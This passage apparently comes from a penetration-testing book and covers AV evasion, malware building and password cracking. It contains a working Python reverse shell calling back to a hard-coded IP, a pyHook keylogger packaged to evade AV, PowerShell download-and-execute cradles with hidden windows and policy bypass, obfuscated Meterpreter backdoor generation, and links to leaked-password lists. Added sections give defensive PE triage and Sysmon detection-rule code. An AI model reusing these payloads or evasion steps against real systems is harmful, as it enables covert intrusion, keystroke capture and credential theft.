resource (/root/veil-output/handlers/ruby_undetected_handler.rc)> set LPORT 8123 
LPORT => 8123 
resource (/root/veil-output/handlers/ruby_undetected_handler.rc)> set ExitOnSession false 
ExitOnSession => false 
resource (/root/veil-output/handlers/ruby_undetected_handler.rc)> exploit -j 
[*] Exploit running as background job. 
[*] Started HTTP reverse handler on http://0.0.0.0:8123/ 
[*] Starting the payload handler... 
msf exploit(handler) > [*] 172.16.151.202:49501 Request received for /WEZf... 
[*] 172.16.151.202:49501 Staging connection for target /WEZf received... 
[*] Meterpreter session 1 opened (172. 
sessions -i 1 
[*] Starting interaction with 1... 


Why pick Ruby over python? This is all about testing which works best for the environment in which 
you are testing. I have seen instances where AV might pick up one type of file, but will not pick up 
another. Keep testing and you will find the best solution for your current situation. 


SMBExec 

(https://github.com/pentestgeek/smbexec) (Kali Linux) 

SMBExec is a tool developed by brav0hax (https://github.com/brav0hax/smbexec), which contains a 
lot of different functionality. In this book, we have used the tool to pull hashes from a domain 
controller, but it can also be used to enumerate shares, validate logins, disable UAC, and create an 
obfuscated Meterpreter executable. brav0hax utilizes a number of different obfuscation techniques, 
including randomization and compiling the payload in native C, to bypass AV (read the source code of 
smbexec.sh). This is what we are going to use to create our reverse shell. 

To create an obfuscated reverse Meterpreter executable: 

• cd /opt/smbexec 

• ./smbexec.sh 

• Select System Access with the following command: 

o 2 

• Select Create an executable and rc script: 

o 2 

• Select windows/meterpreter/reverse_https: 

o 2 

• Enter your local host and port: 

o 172.16.139.209 

o 443 

Once SMBExec finishes and you exit out of the application, a new folder is created in that same 
directory. It follows a similar timestamp folder name. Inside that folder, you will see the 
backdoor.exe, which is your obfuscated reverse https Meterpreter executable. 

root@kali:/opt/smbexec/2015-03-23-1425-smbexec# ls -alh 
-rwxr-xr-x 1 root root 110K Mar 23 14:28 backdoor.exe 
-rw-r--r-- 1 root root 283 Mar 23 14:28 metasetup.rc 
-rw-r--r-- 1 root root 92 Mar 23 14:28 sha1-backdoor.hash 

In that same folder you will also see the metasetup.rc script. RC scripts will be discussed a little later 
in the book, but if you take a look at the file, you will see something similar to the code below: 


• spool /opt/smbexec/2015-03-23-1425-smbexec/msfoutput-1425.txt 

• use exploit/multi/handler 

• set payload windows/meterpreter/reverse_https 

• set LHOST 172.16.139.209 

• set LPORT 443 

• set SessionCommunicationTimeout 600 

• set ExitOnSession false 

• set InitialAutoRunScript migrate -f 

• exploit -j -z 


This is a script that automatically configures and runs a reverse handler for the payload you just 
generated. It also adds commands, such as setting up timeouts and automigrating PIDs. To run the RC 
script, use the following command: 

• msfconsole -r metasetup.rc 


PeCloak.py 

(http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/) (Windows) 


peCloak.py is a Python script that takes an automated approach to AV evasion. Although this is 
experimental code, I really like what Mike Czumak did. He took many of the common evasion tricks 
and wrote something to automate them. He built a simple encoder/decoder, added a number of 
instructions that waste cycles in an effort to trick the AV scanner, and utilized code caves (like we 
discussed with The BackDoor Factory). 


Installation does take a few steps; this was installed on a 32-bit Windows XP system: 

• Download http://www.securitysift.com/download/peCloak.py 

• Install http://sourceforge.net/projects/winappdbg/files/additional%20packages/PyDasm/ 

• Install https://code.google.com/p/pefile/downloads/list 

• Save http://git.n0p.ee/?p=SectionDoubleP.git;a=blob_plain;t=SectionDoubleP.py;h=93717cdd0ac293548fb9S 
as SectionDoubleP.py 

I also had to modify the peCloak.py file: 

• On line 220, I had to change “pe.write(pe.OPTIONAL_HEADER.SizeOfHeaders, 
filename=fname) # MODIFIED WRITE FUNCTION IN PEFILE!!!” to 
“pe.write(‘cloaked.exe’)” 


Once we get peCloak.py running, we can test this on a copy of wce.exe: 

• python.exe peCloak.py -e .text,.data:50:5000 wce.exe 


C:\covert>C:\Python27\python.exe C:\covert\peCloak.py -e .text,.data:50:5000 wce.exe 

peCloak.py (beta) 
| A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool 
| Author: Mike Czumak | T_V3rn1x | @SecuritySift 
| Usage: peCloak.py [options] [path_to_pe_file] (-h or --help) 

ASLR disabled 
Searching for suitable code cave location... 
[*] Searching .text section... 
[*] Searching .rdata section... 
[*] Searching .data section... 
[*] Searching .rsrc section... 
[*] At least 1060 null bytes found in .rsrc section to host code cave 
PE .rsrc section made writeable with attribute 0xE0000020 
Code cave located at 0x4324d5 
PE Section Information Summary: 
[*] Name: .text , Virtual Address: 0x1000, Virtual Size: 0x1bc26, Characteristics: 0x60000020 
[*] Name: .rdata , Virtual Address: 0x1d000, Virtual Size: 0x2e98, Characteristics: 0x40000040 
[*] Name: .data , Virtual Address: 0x20000, Virtual Size: 0x7758, Characteristics: 0xC0000040 
[*] Name: .rsrc , Virtual Address: 0x28000, Virtual Size: 0xa870, Characteristics: 0xE0000020 
[*] Name: .reloc , Virtual Address: 0x33000, Virtual Size: 0x1d2c, Characteristics: 0x42000040 
Preserving the following entry instructions (at entry address 0x410311): 
[*] call 0x416ed8 
Generated Heuristic bypass of 3 iterations 
Generated Encoder with the following instructions: 


peCloak.py Beta 


As we can see, it goes through all of the evasion techniques and produces an output file called 
“cloaked.exe”. In the image below, we take our modified binary and run it to make sure it executes 
normally. When you execute it, you will notice it takes longer to start, due to all the extra 
instructions added by peCloak.py. 






[*] Writing code cave to file 
[+] Heuristic Bypass 
[+] Decoder 
[+] Saved Entry Instructions 
[+] Jump to Restore Execution Flow 
[+] Final Code Cave (len=223): (223-byte hex dump) 
[*] New file saved [cloaked.exe] 

C:\covert>cloaked.exe -h 

WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by 
Use -h for help. 

Options: 
  -l  List logon sessions and NTLM credentials (default). 
  -s  Changes NTLM credentials of current logon session. 
      Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>. 
  -r  Lists logon sessions and NTLM credentials indefinitely. 
      Refreshes every 5 seconds if new sessions are found. 
      Optional: -r<refresh interval>. 


peCloak.py - Cave Jumps 


When running the obfuscated wce.exe file through VirusTotal, we find that it doesn’t get picked up by 
many of the common corporate AV solutions. 


[Figure: VirusTotal report for cloaked.exe. Detection ratio: 17/57. Analysis date: 2015-03-21 23:19:38 UTC. The visible part of the results table shows Zoner, Zillya, ViRobot, VIPRE, TrendMicro-HouseCall, TrendMicro, Total Defense, TheHacker, Symantec, SUPERAntiSpyware and Sophos with no detection, while VBA32 reports Malware-Cryptor.General.3 and Tencent reports Trojan.Win32.Qudamah.Gen.2 (engine updates dated 20150320 to 20150322).]


Virus Total Results 


Remember, this is really beta code, but I wanted to demonstrate how you can write your own 
obfuscators. 
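
Two checks a practitioner would want around the walkthroughs above, the HxD banner overwrite (why it left wce.exe runnable) and peCloak's section changes (what they look like from the analysis side), as one added example. This is not code from the book or from HxD, peCloak or any other tool it mentions; it uses only the Python standard library, and the PE image it inspects is constructed in memory with the same section attributes peCloak printed for wce.exe (0x60000020, 0x40000040, 0xE0000020), not a real binary:

```python
"""Static checks on a PE section table (added example; not code from the book,
HxD, peCloak or any tool it discusses; standard library only).
1. patched_sections / patch_touches_code: which section a byte-level edit
   landed in. The HxD banner overwrite only kept wce.exe working because the
   bytes were in a data section, not in code.
2. suspicious_sections: marks a code-cave tool leaves behind, a section that is
   writable and executable at once and an entry point outside .text.
The sample image is constructed in memory for the demo; it is not a program."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Return (AddressOfEntryPoint, [section dicts]) for a PE image in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                        # IMAGE_FILE_HEADER, 20 bytes
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                            # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # same offset in PE32/PE32+
    sections = []
    for i in range(n_sections):
        hdr = opt + opt_size + 40 * i          # IMAGE_SECTION_HEADER, 40 bytes each
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, hdr)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "raw_ptr": raw_ptr,
                         "raw_size": raw_size, "chars": chars})
    return entry_rva, sections


def section_for_offset(sections, file_offset):
    """Section whose raw data covers a file offset; None for headers or slack."""
    for s in sections:
        if s["raw_ptr"] <= file_offset < s["raw_ptr"] + s["raw_size"]:
            return s
    return None


def patched_sections(original, modified):
    """Names of the sections whose bytes differ between two copies of a file."""
    if len(original) != len(modified):
        raise ValueError("sizes differ: not a byte-for-byte overwrite")
    _, sections = parse_pe(original)
    touched = []
    for off, (a, b) in enumerate(zip(original, modified)):
        if a != b:
            s = section_for_offset(sections, off)
            name = s["name"] if s else "<headers>"
            if name not in touched:
                touched.append(name)
    return touched


def patch_touches_code(original, modified):
    """True when any changed byte sits in a code/executable section."""
    _, sections = parse_pe(original)
    code = {s["name"] for s in sections
            if s["chars"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)}
    return any(name in code for name in patched_sections(original, modified))


def suspicious_sections(data):
    """Triage findings: W+X sections and an entry point that is not in .text."""
    entry_rva, sections = parse_pe(data)
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    findings = ["%s is writable and executable (0x%08X)" % (s["name"], s["chars"])
                for s in sections if s["chars"] & wx == wx]
    entry = next((s for s in sections
                  if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["raw_size"])), None)
    if entry is None:
        findings.append("entry point 0x%X is outside every section" % entry_rva)
    elif entry["name"] != ".text":
        findings.append("entry point 0x%X is in %s, not .text" % (entry_rva, entry["name"]))
    return findings


def build_sample_pe(section_specs, entry_rva):
    """Constructed minimal PE32 image: real headers, zero-filled section bodies."""
    n, opt_size, e_lfanew = len(section_specs), 224, 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, ptr, 0, 0, 0, 0, chars)
                    for name, vaddr, ptr, size, chars in section_specs)
    end = max(ptr + size for _, _, ptr, size, _ in section_specs)
    return (dos + coff + opt + hdrs).ljust(end, b"\0")


# (name, VirtualAddress, PointerToRawData, size, Characteristics); the flag values
# are the ones peCloak printed for wce.exe's .text/.rdata/.rsrc in the chapter.
CLEAN_SECTIONS = [(b".text", 0x1000, 0x200, 0x200, 0x60000020),
                  (b".rdata", 0x2000, 0x400, 0x200, 0x40000040),
                  (b".rsrc", 0x3000, 0x600, 0x200, 0x40000040)]
CLOAKED_SECTIONS = CLEAN_SECTIONS[:2] + [(b".rsrc", 0x3000, 0x600, 0x200, 0xE0000020)]
```

patched_sections(original, modified) names the sections an edit landed in and patch_touches_code tells you whether any of them is executable; an overwrite inside .rdata of the constructed image returns [".rdata"] and False, which is exactly the situation that let wce2.exe keep running. suspicious_sections flags the W+X .rsrc section and the relocated entry point that a code-cave tool leaves behind; both are cheap to check in a triage pipeline, and the entry-point-not-in-.text heuristic is deliberately loose (legitimate packers trip it too), so treat its output as a prompt for a closer look rather than a verdict.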


Python 


Python is your best friend. I use Python to create most of my exploits and tools. There are several 
reasons why Python works so well. First, it is common to see systems which white-list applications 
that allow python files. Second, you can very easily add randomness to get around any signature. And 
third, using something like py2exe you can turn the file into a self-running executable. 


Python Shell 

Watching Dave Kennedy's talk at BSides in 2012 {45} took me down the path of using Python to 
create malicious payloads. The simplest example of this was creating a Python shell and wrapping it 
up with py2exe. 

#!/usr/bin/python 
# Python 2 (the book targets Python 2.7): connect back to HOST:PORT, run each 
# line received through the shell and send the output back. 
import socket, subprocess 
HOST = '192.168.10.100' 
PORT = 5151 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect((HOST, PORT)) 
s.send('[*] Connection Established!') 
while 1: 
    data = s.recv(1024) 
    if data == 'quit': 
        break 
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, 
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE) 
    stdoutvalue = proc.stdout.read() + proc.stderr.read() 
    s.send(stdoutvalue) 
s.close() 

When this code executes, it will create a shell connection back to 192.168.10.100, where I will have 
netcat listening on port 5151. This reverse shell will give me command line access to the host. 
Using pyinstaller, we can convert the Python file into an executable: 

• C:\python27\python.exe C:\utils\pyinstaller-2.0\pyinstaller.py --out=C:\shell\ --noconsole --onefile C:\shell\shell.py 

Again, if you try to scan this file with AV, it won't be picked up. 


Python Keylogger 

Everyone uses different types of keyloggers and this is no different. My goal was to develop 
something that would most likely be accepted on white-listed application lists and be able to run 
undetected by AV. Included below is simple code to have Python start recording all keyboard 
presses: {46} 

import pyHook, pythoncom, sys, logging 
file_log = 'C:\\systemlog.txt' 

def OnKeyboardEvent(event): 
    # append the character of every key-down event to the log file 
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') 
    logging.log(10, chr(event.Ascii)) 
    return True 

hooks_manager = pyHook.HookManager() 
hooks_manager.KeyDown = OnKeyboardEvent 
hooks_manager.HookKeyboard() 
pythoncom.PumpMessages() 


Here is my setup.py file: 

from distutils.core import setup 
import py2exe 

setup(options = {'py2exe': {'bundle_files': 1, 'compressed': True}}, 
      windows = [{'script': "logger.py"}], 
      zipfile = None, 
) 

And using py2exe, I will convert the Python script to an executable with the following commands: 

• python.exe setup.py install 

• python.exe setup.py py2exe 

Now I will have an executable binary of the keylogger that records all keystrokes and stores all of the 
key strokes to C:\systemlog.txt. Pretty simple and easy and AV never detected it. If you need to, you 
may add some randomness in there to make sure that it isn't picked up by signatures or hash matching. 


Other Keyloggers 


Being able to drop an undetectable keylogger can make a huge difference in situations where you 
can’t pull passwords from memory or look for web-based passwords. I will show you two different 
examples that can be executed from a command line. 

Keylogger Using Nishang 

(https://github.com/samratashok/nishang): 

Nishang is a collection of PowerShell scripts used for pre/post exploitation. One of the scripts is 
called Keylogger.ps1. As I keep reiterating throughout the book, and as you will notice in different 
penetration tests, nothing ever works perfectly. You will need to know different ways to execute 
commands and understand that different environments may or may not allow you to do certain things. 
In this case, we assume that we have a shell on the system. We are going to use bitsadmin, which is 
used by Microsoft Windows to download updates, to download our keylogger and put it in the public 
folder. We will then go to the public folder and execute the keylogger. The keylogger has many other 
functions, such as pushing the logs to Twitter, so I recommend you read through it before executing 
anything. 

• cmd.exe /c "bitsadmin /transfer myjob /download /priority high 
https://raw.githubusercontent.com/cheetz/nishang/master/Gather/Keylogger.ps1 
c:\Users\Public\Keylogger.ps1" 

• cd \users\public\ 

• powershell.exe -NoP -W Hidden -exec bypass -noexit -Command 
".\Keylogger.ps1 http://127.0.0.1 stopthis" 

The output will be located at: 

• C:\Users\[Account]\AppData\Local\Temp\key.log 

Note that when looking at the file, it is obfuscated and needs to be converted. Once you move this file 
onto your box, convert the logs using the PowerShell script located here: 

https://raw.githubusercontent.com/cheetz/nishang/master/Utility/Parse_Keys.ps1 

Here is the command to convert the logs: 

• powershell.exe -exec bypass -Command "& {Import-Module .\Parse_Keys.ps1; 
Parse_Keys key.log output.log}" 


And your decoded keylog output file is written to output.log. 


Keylogger Using Powersploit 

(https://github.com/mattifestation/PowerSploit) 


The other keylogger with which I have had some success is the Get-Keystrokes PowerShell script. 
Similar to running the Nishang script, this can be executed with the following command: 

• powershell.exe -exec bypass IEX "(New-Object 
Net.WebClient).DownloadString('https://raw.github.com/cheetz/PowerSploit/master/E 
Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log" 
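
Both launch sequences above leave a distinctive process command line behind, which is what a defender keys on. The following is an added example (not from the book, Nishang or PowerSploit) of the corresponding detection logic run over constructed Sysmon-style process-creation records; the host example.invalid, the parent processes and the timestamps are made up for the demo:

```python
"""Detection side of the two keylogger launch patterns (added example, not from
the book or from Nishang/PowerSploit). SAMPLE_LOG holds constructed, Sysmon-style
process-creation records, not real telemetry; example.invalid stands in for the
download host. Every rule matches on the lower-cased command line only."""
import re

RULES = [
    ("bitsadmin-download",                # bitsadmin /transfer pulling from a URL
     lambda c: "bitsadmin" in c and "/transfer" in c and "http" in c),
    ("powershell-hidden-bypass",          # -W Hidden together with -exec bypass
     lambda c: "powershell" in c
     and re.search(r"-w[a-z]*\s+hidden", c) is not None
     and re.search(r"-e[a-z]*\s+bypass", c) is not None),
    ("powershell-download-cradle",        # IEX over a DownloadString(...) result
     lambda c: "powershell" in c
     and re.search(r"\biex\b", c) is not None and "downloadstring(" in c),
]

SAMPLE_LOG = [
    "2015-03-23T14:28:01|Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=cmd.exe /c \"bitsadmin /transfer myjob /download /priority high"
    " https://example.invalid/Keylogger.ps1 c:\\Users\\Public\\Keylogger.ps1\"",
    "2015-03-23T14:28:09|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=powershell.exe -NoP -W Hidden"
    " -exec bypass -noexit -Command \".\\Keylogger.ps1 http://127.0.0.1 stopthis\"",
    "2015-03-23T14:29:10|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=powershell.exe -exec bypass IEX"
    " \"(New-Object Net.WebClient).DownloadString('https://example.invalid/Get-Keystrokes.ps1');"
    "Get-Keystrokes -LogPath C:\\Users\\Public\\key.log\"",
    "2015-03-23T14:30:00|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|ParentImage=C:\\Windows\\System32\\svchost.exe|CommandLine=powershell.exe -NoProfile"
    " -File C:\\Scripts\\inventory.ps1",                       # benign scheduled script
    "2015-03-23T14:31:00|Image=C:\\Windows\\System32\\bitsadmin.exe"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=bitsadmin /list",   # benign
]


def parse_record(line):
    """'ts|Key=Value|Key=Value' -> dict (values may themselves contain '=')."""
    timestamp, *fields = line.split("|")
    record = {"timestamp": timestamp}
    for field in fields:
        key, _, value = field.partition("=")
        record[key] = value
    return record


def match_rules(command_line):
    """Names of every rule the command line trips, in RULES order."""
    c = command_line.lower()
    return [name for name, test in RULES if test(c)]


def scan(lines):
    """One alert per record that trips at least one rule."""
    alerts = []
    for number, line in enumerate(lines, 1):
        record = parse_record(line)
        hits = match_rules(record.get("CommandLine", ""))
        if hits:
            alerts.append({"line": number,
                           "image": record.get("Image", "").rsplit("\\", 1)[-1],
                           "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print("line %(line)d %(image)s: %(rules)s" % alert)
```

The three rules map to the three things the commands do: a bitsadmin transfer from a URL, PowerShell launched with a hidden window and the execution policy bypassed, and an IEX download cradle. The two benign records (a scheduled -File script, bitsadmin /list) show that the rules are narrower than "any PowerShell" or "any bitsadmin"; in production you would also correlate on ParentImage (cmd.exe spawning bitsadmin or PowerShell) and on scripts being written to and run from \Users\Public.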


Conclusion 


There are many different techniques to evade AV. Although this is not a complete list, this should give 
you a good overview on where to start if you are battling anti-virus. The last thing you want is for AV 
to stop you from popping a box that you can potentially exploit. 


Penetration testing is all about trying out different tools, techniques, and tactics to find what works in 
that particular environment. Remember not to submit your executable to a repository like Virus Total, 
as the lifespan of your executable might shrink dramatically. 



Special Teams - Cracking, Exploits, And Tricks 


This section focuses on all other methods that can assist in penetration testing, but do not fit in the 
other sections. I will discuss some of the tips and tricks I have for cracking password hashes, 
searching for vulnerabilities, and some shortcuts. 


Password Cracking 


There are many different tools for password cracking; however, I am going to focus mainly on the 
two tools that I use: John the Ripper (JtR) and oclHashcat. Both are excellent tools for cracking 
passwords. 

Before I can start talking about different password crackers, it is important to make sure you 
understand the basic definitions. The three things you should generally configure for an efficient 
password cracking process are wordlists, rules, and hashing algorithms. 


Wordlists: This is exactly what it sounds like: files that contain password lists in cleartext. 
The password cracker will hash each one of these passwords and see if the result matches the 
hash that you are trying to crack. 


I generally like to take wordlists from prior password compromises and incorporate them with the 
type of organization you are dealing with. For example, if you are cracking NTLM hashes from a 
domain controller, make sure you understand what their password policy is. There is no point trying 
four or five-letter passwords if they require a minimum of eight characters. 


Here are some of my favorite wordlists: 

List Name: RockYou 

Details: Compromised in 2009 from a social game and advertising website. This is a great list to start 
with as it isn't too large and contains a lot of the common passwords with a decent success rate. 

Download Link: http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 


List Name: Crackstation-human-only 

Details: Real human passwords leaked from various website databases. There are about 64 million 
passwords in this list. GZIP-compressed. 247 MiB compressed. 684 MiB uncompressed. 

Download Link: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


List Name: Crackstation-Full 

Details: Full crackstation passwords leaked from various website databases. Extremely large. GZIP-
compressed (level 9). 4.2 GiB compressed. 15 GiB uncompressed. 

Download Link: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm 


List Name: m3g9tr0n_Passwords_WordList_CLEANED 
(http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords) 

Details: List of 122 million passwords 

Download Link: http://bit.ly/KrTcHF 


List Name: Ten Million Passwords 

Details: A researcher, Mark Burnett, combined all the recent password dumps and compiled a list of 
the top ten million passwords. 

Download Link: https://xato.net/passwords/ten-million-passwords/ 

• Torrent File: magnet:?xt=urn:btih:32E50D9656E101F54120ADA3CE73F7A65EC9D5CB&dn=10-million-combos.zip&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=http%3a%2f%2fbt.careland.comcn%3a6969 

• To create a unique list of just passwords: 

o unzip 10-million-combos.zip 

o cut -f2 10-million-combos.txt | sort -u > 10-million-unique.txt 


List Name: Wick2o’s Password List from Dump Monitor 

Details: Wick2o monitors leaks on pastebin and similar sites. 

Download: git clone https://github.com/wick2o/Dump-Monitor-WordLists.git /opt/Dump-Monitor-WordLists 

Other places to get passwords or password lists: 

• https://github.com/danielmiessler/SecLists/tree/master/Passwords 

• https://archive.org/details/pastebinpastes 

• https://wiki.skullsecurity.org/Passwords 

• http://www.leakedin.com/tag/emailpassword-dump/ 

• https://www.reddit.com/domain/pastie.org/search?q=password+leak&sort=relevance&t=month 

• Scraping all pastebin/pastie/... sites 


Rules: Rules define the modifications to be applied to each word in the wordlist. The best way to describe 
rules is with an easy-to-follow example. We can take the KoreLogicRulesAppendYears 
(http://contest-2010.korelogic.com/rules.html) set of rules, which look like the following: 


• cAz"19[0-9][0-9]" 

• Az"19[0-9][0-9]" 

• cAz"20[01][0-9]" 

• Az"20[01][0-9]" 


It will append the years from 1949 to 2019 to each and every password. If the password list 
contained the word "hacker", it would try to crack the hash for the strings hacker1949 all the way to 
hacker2019. Remember, the more complex your rules are, the more time it will take to finish going 
through all the different words in the wordlist. 

Hash Algorithms: A hashing algorithm is used to generate the password hash. These are very 
important because if you select the wrong algorithm, it will either fail to run or fail to crack. For 
example, if we select the MD5 algorithm for SHA1 hashes, the cracking tools will not find any hashes 
to crack and will exit immediately. 
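
To make the rule and algorithm definitions concrete, here is an added example (not code from the book, John the Ripper or hashcat) that parses the four KoreLogic rules exactly as quoted, expands their [x-y] character classes (as written they enumerate 1900 through 2019), and runs the resulting candidates against a small MD5 hash list constructed from known plaintexts. The rule parser covers only the subset of JtR syntax those four rules use (a leading c for capitalize and Az"..." for append); the wordlist and the hash dump are made up for the demo:

```python
"""Wordlist rules and the hash-algorithm choice, worked through (added example;
not code from the book, John the Ripper or hashcat). Implements just enough of
the JtR rule syntax for the four KoreLogicRulesAppendYears rules: an optional
leading 'c' (capitalize) and Az"..." (append), where the appended text may
contain [x-y] character classes. The hash "dump" is constructed from known
plaintexts so the run is reproducible offline."""
import hashlib
import itertools
import re

KORELOGIC_APPEND_YEARS = [
    'cAz"19[0-9][0-9]"',
    'Az"19[0-9][0-9]"',
    'cAz"20[01][0-9]"',
    'Az"20[01][0-9]"',
]

_TOKEN = re.compile(r"\[([^\]]+)\]|(.)")   # one [class] or one literal character


def _expand_classes(pattern):
    """'19[0-9][0-9]' -> ['1900', '1901', ..., '1999'] (cartesian product)."""
    alternatives = []
    for cls, literal in _TOKEN.findall(pattern):
        if literal:
            alternatives.append([literal])
            continue
        chars, i = [], 0
        while i < len(cls):
            if i + 2 < len(cls) and cls[i + 1] == "-":          # range such as 0-9
                chars.extend(chr(c) for c in range(ord(cls[i]), ord(cls[i + 2]) + 1))
                i += 3
            else:                                               # single character
                chars.append(cls[i])
                i += 1
        alternatives.append(chars)
    return ["".join(parts) for parts in itertools.product(*alternatives)]


def apply_rule(word, rule):
    """Candidates one rule produces from one word (subset of JtR rule syntax)."""
    m = re.fullmatch(r'(c?)Az"([^"]*)"', rule)
    if not m:
        raise ValueError("unsupported rule: %s" % rule)
    capitalize, pattern = m.groups()
    base = word[:1].upper() + word[1:].lower() if capitalize else word
    return [base + suffix for suffix in _expand_classes(pattern)]


def expand_rules(words, rules):
    """Every candidate the cracker will hash, in order, without duplicates."""
    seen, out = set(), []
    for word in words:
        for rule in rules:
            for candidate in apply_rule(word, rule):
                if candidate not in seen:
                    seen.add(candidate)
                    out.append(candidate)
    return out


def hash_hex(text, algo="md5"):
    """Hex digest of text under a hashlib algorithm name (unsalted, as in the chapter)."""
    return hashlib.new(algo, text.encode()).hexdigest()


def crack(target_hashes, candidates, algo):
    """Dictionary attack: {hex digest: plaintext} for every candidate whose
    `algo` digest is in the target list. Picking the wrong algorithm (say sha1
    for an MD5 dump) simply yields no hits, the failure mode described above."""
    targets = {h.lower() for h in target_hashes}
    found = {}
    for candidate in candidates:
        digest = hash_hex(candidate, algo)
        if digest in targets:
            found[digest] = candidate
    return found


if __name__ == "__main__":
    dump = [hash_hex(p) for p in ("Hacker2015", "password1999")]   # constructed MD5 dump
    candidates = expand_rules(["hacker", "password", "woot"], KORELOGIC_APPEND_YEARS)
    print(len(candidates), "candidates from 3 words")
    print("raw-md5:", crack(dump, candidates, "md5"))
    print("sha1   :", crack(dump, candidates, "sha1"))
```

Three words and these four rules give 720 candidates (each rule pair contributes 100 + 20 years, with and without capitalization); expand_rules drops duplicates, so a word that is already capitalized yields 120 rather than 240. Scaled to the rockyou list shown later in the chapter (14,343,296 words) the same four rules mean roughly 3.4 billion hashes, which is the cost the text warns about. Running crack with "sha1" against an MD5 dump returns an empty result, the same symptom as picking the wrong mode in John or oclHashcat.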


Now that we have basic understanding of different cracking configurations, let's compare John the 
Ripper versus oclHashcat. 


John The Ripper 

(http://www.openwall.com/john/) (Windows/Kali Linux/OS X) 


I used to regularly use John the Ripper (JtR) but moved away from it a while ago due to the GPU 
support in oclHashcat. However, JtR Jumbo does have CUDA and OpenCL support now. Here is a 
list of JtR hash formats to help you identify which type of password you are cracking: 
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats. 


Cracking MD5 Hashes 

Let's say you are able to compromise a *nix system or maybe a database full of password hashes. You 
will most likely run into MD5 or SHA hashes, but for the following example, we will assume that 
they are non-salted MD5 hashes. If you are looking to crack standard MD5 hashes, the basic 
command is: 


• john --format=raw-md5 --pot=./list.pot md5list.txt 


This tells John the Ripper to look in the md5list.txt file for MD5 hashes and write any cracked 
passwords into the file list.pot. 


root@kali:~# john --format=raw-md5 --pot=./list.pot md5list.txt 
Loaded 3 password hashes with no different salts (Raw MD5 [128/128 SSE2]) 
test (test) 
password (user) 
woot (hacker) 
guesses: 3 time: 0:00:00:01 DONE (Sun Dec 29 18:32:12 2013) 

If you are using the JtR Jumbo pack and want to take advantage of GPU processing: 

• john --format=raw-md5-opencl --wordlist=./Wordlists/all.lst --rules:Single md5list.txt 


Here is an additional source on using JtR: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords. 


OclHashcat 

(http://hashcat.net/oclhashcat/) (Windows/Kali Linux): 


Honestly, this is the tool I use most when password cracking. As we all know, graphic processing 
units (GPUs) are great for cracking passwords as they utilize many different cores in parallel. The 
advantages of using GPUs vs. CPUs are very significant and this can be demonstrated with the use of 
oclHashcat. 

In the following examples, I am going to go over cracking WPAv2 and NTLMv2. These are the most 
common hash types I run into and they are typically the groundwork for any other types of hashes. If 
you want to see all the different hash types that oclHashcat will support, visit their website at 
http://hashcat.net/oclhashcat/ . 

Cracking WPAv2 

In the beginning of the book, I discussed how to capture the WPAv2 handshake, which is required for 
password cracking. The output from the capture was a .hccap file. This is the file format that 
oclHashcat supports for brute forcing WPA-hashed passwords. 


In the following examples, I am going to utilize oclHashcat on my Windows host using a GeForce 
GTX 680. Generally, I prefer using the ATI Radeon cards, but for this example, it won't make much 
of a difference. To kick off the password cracking, I will use the command: 

• cudaHashcat-plus64.exe -m2500 out.hccap list\rockyou.txt 





C:\oclHashcat-plus-0.14>cudaHashcat-plus64.exe -m 2500 out.hccap list\rockyou.txt 
cudaHashcat-plus v0.14 by atom starting... 

Hashes: 1 total, 1 unique salts, 1 unique digests 
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes 
